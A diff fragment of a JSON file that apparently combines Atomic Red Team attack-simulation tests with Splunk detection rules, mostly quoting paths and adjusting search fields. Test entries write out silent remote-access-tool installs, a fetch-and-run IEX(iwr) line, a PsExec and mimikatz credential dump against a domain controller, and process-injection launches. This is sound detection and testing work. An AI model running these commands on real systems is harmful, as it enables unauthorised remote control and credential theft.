\"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", - "cleanup_command": "try{$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1} catch{}", + "cleanup_command": "try{\"$PathToAtomicsFolder/T1219/bin/GoToCleanup.ps1\"} catch{}", "name": "powershell", "elevation_required": true } @@ -252105,12 +254833,12 @@ "dependencies": [ { "description": "Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})\n", - "prereq_command": "if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{Ammyy_Admin_Path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ammyy.exe\" -UseBasicParsing\n" } ], "executor": { - "command": "Start-Process #{Ammyy_Admin_Path}\n", + "command": "Start-Process \"#{Ammyy_Admin_Path}\"\n", "cleanup_command": "Stop-Process -Name \"Ammyy\" -force -erroraction silentlycontinue\n", "name": "powershell", "elevation_required": true @@ -252134,12 +254862,12 @@ "dependencies": [ { "description": "RemotePC must exist on disk at the specified location (#{RemotePC_Path})\n", - "prereq_command": "if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{RemotePC_Path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe\" -OutFile \"#{RemotePC_Path}\" -UseBasicParsing\n" } ], "executor": { - "command": "Start-Process #{RemotePC_Path}\n", + "command": "Start-Process \"#{RemotePC_Path}\"\n", "cleanup_command": "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"ServiceMonitor\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"StartRPCService\" -Confirm:$False -ErrorAction SilentlyContinue \nStop-Process -Name \"RemotePCPerformance\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCPerformanceService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCUIU\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCDownloader\" -force -erroraction silentlycontinue\nStop-Process -Name \"RemotePCService\" -force -erroraction silentlycontinue\nStop-Process -Name \"RPCService\" -force -erroraction silentlycontinue\n", "name": "powershell", "elevation_required": true @@ -252163,12 +254891,12 @@ "dependencies": [ { "description": "NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})\n", - "prereq_command": "if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{NetSupport_Path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n(New-Object Net.WebClient).DownloadFile(\"https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe\",\"#{NetSupport_Path}\")\n" } ], "executor": { - "command": "Start-Process #{NetSupport_Path} -ArgumentList \"/S /v/qn\"\n", + "command": "Start-Process \"#{NetSupport_Path}\" -ArgumentList \"/S /v/qn\"\n", "cleanup_command": "Stop-Process -Name \"client32\" -force -erroraction silentlycontinue\n", "name": "powershell", "elevation_required": true @@ -252192,7 +254920,7 @@ "dependencies": [ { "description": "Ultraviewer installer must be downloaded and exist on the disk at the specified location. (#{UltraViewer_Path})\n", - "prereq_command": "if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{UltraViewer_Path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n(New-Object Net.WebClient).DownloadFile(\"https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe\",\"#{UltraViewer_Path}\")\n" } ], @@ -252222,7 +254950,7 @@ { "description": "UltraVNC must exist at (#{UltraVNC_Viewer_Path})\n", "prereq_command": "if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\vncsetup.exe\"\nstart-process PathToAtomicsFolder\\..\\ExternalPayloads\\vncsetup.exe /silent\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\vncsetup.exe\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\vncsetup.exe\" /silent\n" } ], "executor": { @@ -252251,7 +254979,7 @@ { "description": "MSP360 must exist at (#{MSP360_Connect_Path})\n", "prereq_command": "if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe \"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe /S \n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" \"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" /S \n" } ], "executor": { @@ -255193,7 +257921,7 @@ } ], "command_list": [ - "$notepad = Start-Process notepad -passthru\nStart-Process $PathToAtomicsFolder\\T1055.003\\bin\\InjectContext.exe\nStart-Sleep -Seconds 5\nStop-Process $notepad.id" + "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055.003\\bin\\InjectContext.exe\"\nStart-Sleep -Seconds 5\nStop-Process $notepad.id" ], "commands": [], "queries": [], @@ -255213,7 +257941,7 @@ "windows" ], "executor": { - "command": "$notepad = Start-Process notepad -passthru\nStart-Process $PathToAtomicsFolder\\T1055.003\\bin\\InjectContext.exe\nStart-Sleep -Seconds 5\nStop-Process $notepad.id", + "command": "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055.003\\bin\\InjectContext.exe\"\nStart-Sleep -Seconds 5\nStop-Process $notepad.id", "name": "powershell" } } @@ -255602,7 +258330,7 @@ ], "command_list": [ "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", - "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null" + "Expand-Archive -Path \"\\..\\ExternalPayloads\\T1036.zip\" -DestinationPath \"$env:userprofile\\Downloads\\T1036\" -Force\ncd \"$env:userprofile\\Downloadss\\T1036\"\ncmd /c \"$env:userprofile\\Downloads\\T1036\\README.cmd\" >$null 2>$null" ], "commands": [], "queries": [ @@ -256612,13 +259340,13 @@ "dependencies": [ { "description": "Zip file must be present.", - "prereq_command": "if (Test-Path $env:userprofile\\Downloads\\T1036.zip) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest -OutFile \"$env:userprofile\\Downloads\\T1036.zip\" #{url}\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1036.zip\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest #{url} -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1036.zip\" \n" } ], "executor": { - "command": "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", - "cleanup_command": "taskkill /IM Calculator.exe /f >$null 2>$null\nRemove-Item $env:userprofile\\Downloads\\T1036 -recurse -ErrorAction Ignore", + "command": "Expand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1036.zip\" -DestinationPath \"$env:userprofile\\Downloads\\T1036\" -Force\ncd \"$env:userprofile\\Downloadss\\T1036\"\ncmd /c \"$env:userprofile\\Downloads\\T1036\\README.cmd\" >$null 2>$null", + "cleanup_command": "taskkill /IM Calculator.exe /f >$null 2>$null\nRemove-Item \"$env:userprofile\\Downloads\\T1036\" -recurse -ErrorAction Ignore", "name": "powershell" } } @@ -258435,7 +261163,8 @@ "Chaos Ransomware", "Trickbot", "Amadey", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -258691,7 +261420,7 @@ { "name": "Suspicious Copy on System32", "description": "This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell*\",\"pwsh.exe\", \"sqlps.exe\", \"sqltoolsps.exe\", \"powershell_ise.exe\") AND `process_copy` AND Processes.process IN(\"*\\\\Windows\\\\System32\\*\", \"*\\\\Windows\\\\SysWow64\\\\*\") AND Processes.process = \"*copy*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `suspicious_copy_on_system32_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell*\",\"pwsh.exe\", \"sqlps.exe\", \"sqltoolsps.exe\", \"powershell_ise.exe\") AND `process_copy` AND Processes.process IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWow64\\\\*\") AND Processes.process = \"*copy*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id temp | `drop_dm_object_name(Processes)` | eval splitted_commandline=split(process,\" \") | eval first_cmdline=lower(mvindex(splitted_commandline,0)) | where NOT LIKE(first_cmdline,\"%\\\\windows\\\\system32\\\\%\") AND NOT LIKE(first_cmdline,\"%\\\\windows\\\\syswow64\\\\%\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`suspicious_copy_on_system32_filter`", "tags": { "name": "Suspicious Copy on System32", "analytic_story": [ @@ -258709,7 +261438,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "execution of copy exe to copy file from $process$ in $dest$", + "message": "Execution of copy exe to copy file from $process$ in $dest$", "mitre_attack_id": [ "T1036.003", "T1036" @@ -258726,7 +261455,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -258913,7 +261642,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -259165,7 +261894,8 @@ "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", - "Qakbot" + "Qakbot", + "Windows Error Reporting Service Elevation of Privilege Vulnerability" ], "asset_type": "Endpoint", "cis20": [ @@ -259251,7 +261981,7 @@ { "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic identifies native .net binaries within the Windows operating system that may be abused by adversaries by moving it to a new directory. The analytic identifies the .net binary by using a lookup and compares the process name and original file name (internal name). The analytic utilizes a lookup with the is_net_windows_file macro to identify the binary process name and original file name. if one or the other matches an alert will be generated. Adversaries abuse these binaries as they are native to windows and native DotNet. Note that not all SDK (post install of Windows) are captured in the lookup.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", "tags": { "name": "Windows DotNet Binary in Non Standard Path", "analytic_story": [ @@ -259376,7 +262106,7 @@ { "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic identifies the Windows binary InstallUtil.exe running from a non-standard location. The analytic utilizes a macro for InstallUtil and identifies both the process_name and original_file_name.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", "tags": { "name": "Windows InstallUtil in Non Standard Path", "analytic_story": [ @@ -259718,8 +262448,8 @@ } ], "command_list": [ - "sdbinst.exe \\T1546.011\\bin\\AtomicShimx86.sdb\n", - "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "sdbinst.exe \"\\T1546.011\\bin\\AtomicShimx86.sdb\"\n", + "Copy-Item \"$PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb\" C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item \"$PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb\" C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n" ], "commands": [], @@ -259750,8 +262480,8 @@ "dependencies": [ { "description": "Shim database file must exist on disk at specified location (#{file_path})\n", - "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb\" -OutFile \"#{file_path}\"\n" + "prereq_command": "if (Test-Path \"#{file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path \"#{file_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb\" -OutFile \"#{file_path}\"\n" }, { "description": "AtomicTest.dll must exist at c:\\Tools\\AtomicTest.dll\n", @@ -259760,8 +262490,8 @@ } ], "executor": { - "command": "sdbinst.exe #{file_path}\n", - "cleanup_command": "sdbinst.exe -u #{file_path} >nul 2>&1\n", + "command": "sdbinst.exe \"#{file_path}\"\n", + "cleanup_command": "sdbinst.exe -u \"#{file_path}\" >nul 2>&1\n", "name": "command_prompt", "elevation_required": true } @@ -259774,7 +262504,7 @@ "windows" ], "executor": { - "command": "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "command": "Copy-Item \"$PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb\" C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item \"$PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb\" C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", "cleanup_command": "Remove-Item C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\nRemove-Item C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -260229,7 +262959,7 @@ { "name": "Registry Keys for Creating SHIM Databases", "description": "This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\Custom* OR Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB*) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\Custom* OR Registry.registry_path=*CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB*) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter`", "tags": { "name": "Registry Keys for Creating SHIM Databases", "analytic_story": [ @@ -261572,7 +264302,7 @@ { "name": "Add DefaultUser And Password In Registry", "description": "this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name= DefaultPassword OR Registry.registry_value_name= DefaultUserName) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.dest Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `add_defaultuser_and_password_in_registry_filter`", "tags": { "name": "Add DefaultUser And Password In Registry", "analytic_story": [ @@ -261630,7 +264360,7 @@ { "name": "Auto Admin Logon Registry Entry", "description": "this search is to detect a suspicious registry modification to implement auto admin logon to a host. This technique was seen in BlackMatter ransomware to automatically logon to the compromise host after triggering a safemode boot to continue encrypting the whole network. This behavior is not a common practice and really a suspicious TTP or alert need to be consider if found within then network premise.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon*\" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter`", "tags": { "name": "Auto Admin Logon Registry Entry", "analytic_story": [ @@ -261896,7 +264626,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -261912,7 +264642,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -262864,7 +265594,7 @@ { "name": "Monitor Registry Keys for Print Monitors", "description": "This search looks for registry activity associated with modifications to the registry key `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path=\"*CurrentControlSet\\\\Control\\\\Print\\\\Monitors*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path=\"*CurrentControlSet\\\\Control\\\\Print\\\\Monitors*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter`", "tags": { "name": "Monitor Registry Keys for Print Monitors", "analytic_story": [ @@ -263729,8 +266459,9 @@ ], "command_list": [ "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", - "\\..\\ExternalPayloads\\PsExec.exe /accepteula \\\\DC1 -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", - "$notepad = Start-Process notepad -passthru\nStart-Process $PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\n", + "\"\\..\\ExternalPayloads\\PsExec.exe\" /accepteula \\\\DC1 -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "$notepad = Start-Process notepad -passthru\nStart-Process \"$PathToAtomicsFolder\\T1055\\bin\\x64\\InjectView.exe\"\n", + "Start-Process \"\\T1055\\bin\\x64\\redVanity.exe\" (Start-Process calc.exe -PassThru).Id\n", 